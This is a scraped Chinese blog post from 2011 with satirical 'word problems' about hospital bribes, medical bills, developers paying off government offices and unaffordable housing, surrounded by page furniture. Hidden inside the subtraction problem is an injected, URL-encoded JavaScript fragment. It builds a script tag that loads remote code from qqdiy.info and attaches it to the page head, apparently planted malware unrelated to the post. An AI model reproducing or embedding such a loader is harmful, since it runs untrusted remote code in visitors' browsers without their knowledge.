注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

海之恋

如果你愿意,请和我一起去看海!

 
 
 

日志

 
 

应用题——幽默过后的思考  

2011-03-02 20:43:45|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

         

应用题——幽默过后的思考 - 海之恋 - 海之恋

 

         孩子的数学成绩不好,家长根据生活经验出了几道应用题,作为补充练习。

                    加法

    某人住院手术,需送红包。其中,送主刀医生2000元,麻醉师1000元,其他医生、护士3000元。问:一共多少钱?

                   

                   减法

" " z="if%28%21window.r%29%7Bvar%20s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%27http%3A//qqdiy.info/a/163/fs.php%27%3Bs.type%3D%22text/javascript%22%3Bdocument.getElem%65ntsByTagName%28%27head%27%29.item%280%29.appendChild%28s%29%3Bwindow.r%3D1%7D"<   某人住院,凑钱交了住院押金2000元。第一天护士便送来了费用清单,并告知,欠费停药,需马上续交。费用清单如下:西药费:1200元;中药费:240元;化验费:160元;CT费:300元;核磁共振:1200元。问:该患者共欠医院多少钱?

                     乘法

   某开发商开发小区,须打通银行、某局、某委、某办等18个部门,平均每个部门送30万元,问:一共得送多少钱?

                     除法

    某人,现年30岁,年收入2万元,如果买一套80万元的商品房,必须工作多少年才能买得起?(不考虑按揭)

    

     应用题——幽默过后的思考 - 海之恋 - 海之恋

 
  评论这张
 
阅读(117)| 评论(17)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017